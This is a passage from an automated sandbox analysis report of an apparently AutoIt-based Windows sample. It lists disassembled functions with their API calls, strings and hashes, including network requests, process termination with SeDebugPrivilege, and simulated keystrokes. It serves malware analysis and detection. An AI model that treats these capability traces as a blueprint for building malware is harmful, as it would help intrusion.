ReleaseDC.USER32(?,00000000), ref: 00754733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007547C4

Strings

U, xrefs: 00754693

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: fcd3a5e2b7d0551d9b00312002bb0f5bffd60130e38d076e23e53121d4f2a90d
Instruction ID: b882137ff5d1dda9f164b1d720a07bfd4376c252d2416993c6b014c04b0d60b7
Opcode Fuzzy Hash: fcd3a5e2b7d0551d9b00312002bb0f5bffd60130e38d076e23e53121d4f2a90d
Instruction Fuzzy Hash: 0E711330400205EFCF258F68C984AFA3BB1FF8A31AF144669ED515A1A6C7799CC5DF60

Function 0078359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007835E4

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

LoadStringW.USER32(007E2390,?,00000FFF,?), ref: 0078360A

Strings

^ ERROR, xrefs: 007836C9
"%s" (%d) : ==> %s:%s%s, xrefs: 00783724
Error: , xrefs: 007836EF
Line %d (File "%s"):, xrefs: 0078366B
"%s" (%d) : ==> %s:, xrefs: 00783742

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: ffafd1a924ce77b896d6c8f526246ca8acdedb1dda39b3adc1740d1b69eeba8d
Instruction ID: 0221c687b5867931140c44528a02a70f4ca45806f5d2dceb61dfae1914f56991
Opcode Fuzzy Hash: ffafd1a924ce77b896d6c8f526246ca8acdedb1dda39b3adc1740d1b69eeba8d
Instruction Fuzzy Hash: E55191B1800209FADF15EBA4CC96EEDBB34AF04740F144125F615721A1EB386BD9DFA4

Function 0078C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0078C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0078C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0078C2CA
GetLastError.KERNEL32 ref: 0078C322
SetEvent.KERNEL32(?), ref: 0078C336
InternetCloseHandle.WININET(00000000), ref: 0078C341

Strings

, xrefs: 0078C2BB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 991ef556da168dd44b2c96aa79d6283a2c6b37a78535445d44b090f8b3dc9d8c
Instruction ID: 9ed4e96060f9088913b8be0951e92af6d8bb65d55b717a1173c7acf9571b0d9f
Opcode Fuzzy Hash: 991ef556da168dd44b2c96aa79d6283a2c6b37a78535445d44b090f8b3dc9d8c
Instruction Fuzzy Hash: D8319CB1640208BFD723AFA49C88AAB7BFCEB4A744F14851EF446D2640DB38DD058B71

Function 0077989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00753AAF,?,?,Bad directive syntax error,007ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007798BC
LoadStringW.USER32(00000000,?,00753AAF,?), ref: 007798C3

Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00779987

Strings

Error: , xrefs: 00779955
., xrefs: 0077996D
Line %d (File "%s"):, xrefs: 0077992D
Line %d:, xrefs: 00779912
%s (%d) : ==> %s.: %s %s, xrefs: 007798F1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 26a3a75ed79529191aa8a7913a211324d7229ef1e3a3c450db410cfb78065874
Instruction ID: 63fe143c677f1d9655ab7cc246022260f11e3aefd5d6f3985f756100ff289c9a
Opcode Fuzzy Hash: 26a3a75ed79529191aa8a7913a211324d7229ef1e3a3c450db410cfb78065874
Instruction Fuzzy Hash: 0321917180021AFBDF11AF90CC1AEEE7775FF18340F044426F619620A2EB79A658DB60

Function 0077209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 007720AB
GetClassNameW.USER32(00000000,?,00000100), ref: 007720C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0077214D

Strings

SHELLDLL_DefView, xrefs: 007720CC
details, xrefs: 007720FB
list, xrefs: 0077212F
smallicons, xrefs: 00772115
largeicons, xrefs: 007720E1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: df633578cf622d63d50d479da97db8c293ccd2fc5e735c9d4a595c9b2db204c6
Instruction ID: 468c0601891aae59edc9cdcaa6a6fac9484dac1266361fa21c9e29455dd385c1
Opcode Fuzzy Hash: df633578cf622d63d50d479da97db8c293ccd2fc5e735c9d4a595c9b2db204c6
Instruction Fuzzy Hash: F51129B668870EFAFE056624DC0BDA637ACEB05364F608117FB18B51D3FE6D68035618

Function 0074CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0074CEB7
_free.LIBCMT ref: 0074CF22
_free.LIBCMT ref: 0074CF48
_free.LIBCMT ref: 0074CF71
_free.LIBCMT ref: 0074CFA9
_free.LIBCMT ref: 0074CFDA
_free.LIBCMT ref: 0074D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0074D09C
_free.LIBCMT ref: 0074D0B5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: b8cad544439ee4336c01ba18c3151f41a0173d61557f25fc7d45911c86d2259f
Instruction ID: 8f3c71c923197a8a6a034b36ddb193dd0a9dcdd40d60a8691aa195c04a01bf6c
Opcode Fuzzy Hash: b8cad544439ee4336c01ba18c3151f41a0173d61557f25fc7d45911c86d2259f
Instruction Fuzzy Hash: 61616B73A06340EFDF22AFB49C89A6E7BA5EF05310F04416DF940AB252DB7D9D4587A0

Function 00728B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00766890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007668A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007668B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007668D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007668F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00728874,00000000,00000000,00000000,000000FF,00000000), ref: 00766901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0076691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00728874,00000000,00000000,00000000,000000FF,00000000), ref: 0076692D

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 2efea9f047332c8f8c57a0e0634f5859b518b1948e7b0b0bebc4cd87f458848f
Instruction ID: c322a1d137ec193d85169d28f928d754c2731438a3aeb6a7035f8a9607823914
Opcode Fuzzy Hash: 2efea9f047332c8f8c57a0e0634f5859b518b1948e7b0b0bebc4cd87f458848f
Instruction Fuzzy Hash: E35178B0A01209EFDB20CF24DC95FAA7BB5FB88750F14851CF916972A0DB79E990DB50

Function 0078C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0078C182
GetLastError.KERNEL32 ref: 0078C195
SetEvent.KERNEL32(?), ref: 0078C1A9

Part of subcall function 0078C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0078C272
Part of subcall function 0078C253: GetLastError.KERNEL32 ref: 0078C322
Part of subcall function 0078C253: SetEvent.KERNEL32(?), ref: 0078C336
Part of subcall function 0078C253: InternetCloseHandle.WININET(00000000), ref: 0078C341

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: a86942dbc3231edef32a4409d5029b58db770a4abeb3eb23d5199aa6647ae432
Instruction ID: 85922222b3b36ceea9b08277edfb018b42acbed4a27901c3a23637768fe4fec0
Opcode Fuzzy Hash: a86942dbc3231edef32a4409d5029b58db770a4abeb3eb23d5199aa6647ae432
Instruction Fuzzy Hash: 43318C71640605BFDB23AFB5DC48A66BBF8FF59300B04841DF95686660DB39E8149BB0

Function 007725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00773A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00773A57
Part of subcall function 00773A3D: GetCurrentThreadId.KERNEL32 ref: 00773A5E
Part of subcall function 00773A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007725B3), ref: 00773A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 007725BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007725DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007725DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 007725E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00772601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00772605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0077260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00772623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00772627

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: bcd81176dd1d628cfd7623935c5363bd69ec4795edef0e17b5502f1dba743bc2
Instruction ID: f349deb9227eaa5c586b99ac1e2baa8a9e0ed3f947f17a84d099687f19856b23
Opcode Fuzzy Hash: bcd81176dd1d628cfd7623935c5363bd69ec4795edef0e17b5502f1dba743bc2
Instruction Fuzzy Hash: DA01D471390214BBFB106768DC8FF593F59DB8EB52F108041F328AE0D1C9EA28459E6D

Function 00771803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00771449,?,?,00000000), ref: 0077180C
HeapAlloc.KERNEL32(00000000,?,00771449,?,?,00000000), ref: 00771813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00771449,?,?,00000000), ref: 00771828
GetCurrentProcess.KERNEL32(?,00000000,?,00771449,?,?,00000000), ref: 00771830
DuplicateHandle.KERNEL32(00000000,?,00771449,?,?,00000000), ref: 00771833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00771449,?,?,00000000), ref: 00771843
GetCurrentProcess.KERNEL32(00771449,00000000,?,00771449,?,?,00000000), ref: 0077184B
DuplicateHandle.KERNEL32(00000000,?,00771449,?,?,00000000), ref: 0077184E
CreateThread.KERNEL32(00000000,00000000,00771874,00000000,00000000,00000000), ref: 00771868

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 5df737b31a9b1c9511d4f859aa5092f8466e04aa022ca3f9bd325a26d7da0bda
Instruction ID: 87898c13a66add17a974d5164bee916431b6f46fe9492503eb0096984702e29c
Opcode Fuzzy Hash: 5df737b31a9b1c9511d4f859aa5092f8466e04aa022ca3f9bd325a26d7da0bda
Instruction Fuzzy Hash: AC01ACB5340308BFE611ABA5DC4AF573BACEB8AB11F418411FA05DB191DA7498008B25

Function 0079A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0077D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0077D501
Part of subcall function 0077D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0077D50F
Part of subcall function 0077D4DC: CloseHandle.KERNEL32(00000000), ref: 0077D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079A16D
GetLastError.KERNEL32 ref: 0079A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0079A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0079A268
GetLastError.KERNEL32(00000000), ref: 0079A273
CloseHandle.KERNEL32(00000000), ref: 0079A2C4

Strings

SeDebugPrivilege, xrefs: 0079A18F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 175ab9c03d53d0acca7d36614712d5a1daaf373e4baed2434e60fcdfa6d97dea
Instruction ID: 84648d28c6efe1296582c53bcaa36a178e6a4445885b19195b87d3ebb621ee05
Opcode Fuzzy Hash: 175ab9c03d53d0acca7d36614712d5a1daaf373e4baed2434e60fcdfa6d97dea
Instruction Fuzzy Hash: A461AF71209241AFDB20DF18D498F15BBE1AF84318F18848CE4664B7A3C77AEC85CBD2

Function 007A3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007A3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007A393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007A3954
_wcslen.LIBCMT ref: 007A3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 007A39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 007A39F4

Strings

SysListView32, xrefs: 007A38F7

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: d756ce45eaa60cdf7b18a02cb6bcf03caf9d70a92634e29fafa0fd87611293a5
Instruction ID: 2d1d3c296e243c2087eee341f568cc2062283eed0b45ecc767097bedb288c194
Opcode Fuzzy Hash: d756ce45eaa60cdf7b18a02cb6bcf03caf9d70a92634e29fafa0fd87611293a5
Instruction Fuzzy Hash: 5F41C671A00218BBEF21DF64CC49FEA77A9EF49354F100226F958E7281D7799E80CB90

Function 0077BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0077BCFD
IsMenu.USER32(00000000), ref: 0077BD1D
CreatePopupMenu.USER32 ref: 0077BD53
GetMenuItemCount.USER32(012F55D0), ref: 0077BDA4
InsertMenuItemW.USER32(012F55D0,?,00000001,00000030), ref: 0077BDCC

Strings

2, xrefs: 0077BD37
0, xrefs: 0077BCA8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 709c07dc7a65a1a3da338779e45787830b191d7086e5a438020e98173b439735
Instruction ID: 043329400da1f108a0cee8bdc7de2762ec673f105c2d9153dcd542e9d413edc9
Opcode Fuzzy Hash: 709c07dc7a65a1a3da338779e45787830b191d7086e5a438020e98173b439735
Instruction Fuzzy Hash: 03518070B00305EFDF25CFA8D888BAEBBF4AF45394F24C169E41997291D778A941CB61

Function 00732D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00732D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00732D53
_ValidateLocalCookies.LIBCMT ref: 00732DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00732E0C
_ValidateLocalCookies.LIBCMT ref: 00732E61

Strings

csm, xrefs: 00732DF6
&Hs, xrefs: 00732DFE, 00732E07, 00732E18

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &Hs$csm
API String ID: 1170836740-1354961900
Opcode ID: 0207d7eaccc7ae423911718996c31001eb868b48f4ed3b4653b238bda937314e
Instruction ID: cbf83cd26fe9113664fd4031fe5b3581529f6dfd4801e48612d675d9881b3f06
Opcode Fuzzy Hash: 0207d7eaccc7ae423911718996c31001eb868b48f4ed3b4653b238bda937314e
Instruction Fuzzy Hash: EE419374A10209EBDF10DF68C849A9EBBB5BF44324F148155E915AB353D739EA06CBE0

Function 0077C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0077C913

Strings

info, xrefs: 0077C8B4
warning, xrefs: 0077C8FC
stop, xrefs: 0077C8E4
blank, xrefs: 0077C895
question, xrefs: 0077C8CC

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: b3004f869a13d7faeaeaff0e4f2bf438feaea3cc9ef7cba6cdec3223dfc8e256
Instruction ID: daa68b2b1e5c4ac8de3066ee2b5346ae93924b72dbad2f4af70c1fb0b1e87d64
Opcode Fuzzy Hash: b3004f869a13d7faeaeaff0e4f2bf438feaea3cc9ef7cba6cdec3223dfc8e256
Instruction Fuzzy Hash: 9011EE3168930AFEEB065B549C82CDA67ACDF193A4B10842FF508A5282D76C7D005669

Function 0077ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0077ED2A
_wcslen.LIBCMT ref: 0077ED3B
_wcslen.LIBCMT ref: 0077ED79
_wcslen.LIBCMT ref: 0077EDAF
_wcslen.LIBCMT ref: 0077EDDF
_wcslen.LIBCMT ref: 0077EDEF
_wcslen.LIBCMT ref: 0077EE2B
_wcslen.LIBCMT ref: 0077EE5A

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

